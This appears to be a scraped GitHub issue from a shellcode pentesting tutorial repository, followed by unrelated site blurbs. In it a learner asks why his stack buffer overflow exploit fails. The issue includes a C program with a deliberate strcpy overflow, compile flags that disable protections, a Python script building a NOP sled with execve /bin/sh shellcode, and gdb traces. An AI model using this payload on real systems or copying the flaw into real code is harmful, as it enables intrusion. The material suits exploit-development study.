hamza-megahed / pentest-with-shellcode Goto Github PK
View Code? Open in Web Editor NEWPenetration testing with shellcode codes
Penetration testing with shellcode codes
Hi @Hamza-Megahed ,
I was unable reproduce https://github.com/Hamza-Megahed/pentest-with-shellcode/tree/master/7-exploit-development-part1,
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int copy_to_buffer(char* input)
{
char buffer[50];
strcpy (buffer,input);
return 0;
}
void main (int argc, char *argv[])
{
int local_variable = 1;
copy_to_buffer(argv[1]);
exit(0);
}
gcc -m32 -fno-stack-protector -z execstack buffer.c -o buffer
#!/bin/usr/python
import struct
jump_shellcode = struct.pack("<I", 0xffffd0fc)
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buffer = "\x90" * 39
buffer += shellcode
buffer += jump_shellcode
fp = open("3.txt", "w")
fp.write(buffer)
fp.close()
print "Done!"
(gdb)
(gdb)
(gdb) break main
Breakpoint 1 at 0x58b
(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)
Breakpoint 1, 0x5655558b in main ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0cc: 0x5655556f 0xffffd0ee 0xffffd3e1 0xffffd0fb
0xffffd0dc: 0x56555559 0x000000c2 0x00000000 0x00c30000
0xffffd0ec: 0x90900001 0x90909090 0x90909090 0x90909090
0xffffd0fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd10c: 0x90909090 0x90909090 0x90909090 0x50c03190
0xffffd11c: 0x732f2f68 0x622f6868 0xe3876e69 0x80cd0bb0
0xffffd12c: 0x42424242
you see overwrite EIP
but when i set any address 0xffffd0fc
always i get error Segmentation fault. not work /bin/sh
,
After set EIP
(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)
Program received signal SIGSEGV, Segmentation fault.
0xffffd126 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0c0: 0xffffd0fa 0x56556fd4 0xf7f9d000 0x5655556f
0xffffd0d0: 0xffffd0ee 0xffffd3e1 0xffffd0fb 0x56555559
0xffffd0e0: 0x000000c2 0x00000000 0x00c30000 0x90900001
0xffffd0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd100: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd110: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xffffd120: 0x622f6868 0x6e69622f 0x68732f2f 0x00000000
0xffffd130: 0xffffd300 0x56556fd4 0x00000002 0x56555593
0xffffd140: 0x00000002 0xffffd204 0xffffd210 0x00000001
EAX: 0x0
EBX: 0xe3876e69
ECX: 0xffffd420 --> 0xffffd0
EDX: 0xffffd12d --> 0x0
ESI: 0x2
EDI: 0xf7f9d000 --> 0x1d1d70
EBP: 0x80cd0bb0
ESP: 0xffffd124 ("/bin//sh")
EIP: 0xffffd126 ("in//sh")
my EIP is 0xffffd126 ("in//sh")
2 byte is missing here why?
Thanks,
Ahmed
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.